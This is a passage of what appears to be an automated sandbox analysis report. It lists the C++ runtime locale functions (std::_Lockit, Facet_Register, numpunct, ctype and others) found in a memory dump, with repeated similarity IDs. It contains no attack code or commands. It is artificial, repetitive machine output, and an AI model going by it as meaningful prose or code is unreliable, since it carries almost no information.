                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0577DE
                                                                                                            • int.LIBCPMT ref: 6F0577F5
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057818
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05782F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05784F
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05785C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057615
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05761F
                                                                                                            • int.LIBCPMT ref: 6F057636
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057659
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057670
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057690
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05769D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0576AA
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0576B4
                                                                                                            • int.LIBCPMT ref: 6F0576CB
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0576EE
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057705
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057725
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057732
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06555E
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065568
                                                                                                            • int.LIBCPMT ref: 6F06557F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0655A2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0655B9
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0655D9
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0655E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0654C9
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0654D3
                                                                                                            • int.LIBCPMT ref: 6F0654EA
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F06550D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065524
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065544
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065551
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06530A
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065314
                                                                                                            • int.LIBCPMT ref: 6F06532B
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F06534E
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065365
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065385
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05732C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057336
                                                                                                            • int.LIBCPMT ref: 6F05734D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F057370
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057387
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0573A7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0573B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057B52
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057B5C
                                                                                                            • int.LIBCPMT ref: 6F057B73
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F057B96
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057BAD
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057BCD
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057BDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051A49
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051A53
                                                                                                            • int.LIBCPMT ref: 6F051A6A
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F051A8D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051AA4
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051AC4
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065275
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06527F
                                                                                                            • int.LIBCPMT ref: 6F065296
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F0652B9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0652D0
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0652F0
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0652FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057297
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0572A1
                                                                                                            • int.LIBCPMT ref: 6F0572B8
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F0572DB
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0572F2
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057312
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05731F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057ABD
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057AC7
                                                                                                            • int.LIBCPMT ref: 6F057ADE
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F057B01
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057B18
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057B38
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057B45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051ADE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051AE8
                                                                                                            • int.LIBCPMT ref: 6F051AFF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F051B22
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051B39
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051B59
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051B66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2958136301-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05716D
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057177
                                                                                                            • int.LIBCPMT ref: 6F05718E
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F0571B1
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0571C8
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0571E8
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0571F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2958136301-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057202
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05720C
                                                                                                            • int.LIBCPMT ref: 6F057223
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • ctype.LIBCPMT ref: 6F057246
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05725D
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05727D
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05728A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2958136301-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057043
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05704D
                                                                                                            • int.LIBCPMT ref: 6F057064
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F057087
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05709E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0570BE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0570CB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Allocate$Max_value
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124748770-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 6F05E172
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1DB
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1ED
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E205
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E215
                                                                                                            • _Getvals.LIBCPMT ref: 6F05E237
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568BB
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3549167292-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057D11
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057D1B
                                                                                                            • int.LIBCPMT ref: 6F057D32
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057D6C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057D8C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057580
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05758A
                                                                                                            • int.LIBCPMT ref: 6F0575A1
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0575DB
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0575FB
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057608
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0655F3
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0655FD
                                                                                                            • int.LIBCPMT ref: 6F065614
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06564E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06566E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F06567B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051C08
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051C12
                                                                                                            • int.LIBCPMT ref: 6F051C29
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051C63
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051C83
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051C90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065434
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06543E
                                                                                                            • int.LIBCPMT ref: 6F065455
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06548F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0654AF
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0654BC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057456
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057460
                                                                                                            • int.LIBCPMT ref: 6F057477
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0574B1
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0574D1
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0574DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057C7C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057C86
                                                                                                            • int.LIBCPMT ref: 6F057C9D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057CD7
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057CF7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0574EB
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0574F5
                                                                                                            • int.LIBCPMT ref: 6F05750C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057546
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057566
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057573
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051B73
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051B7D
                                                                                                            • int.LIBCPMT ref: 6F051B94
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F051BCE
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F051BEE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F051BFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
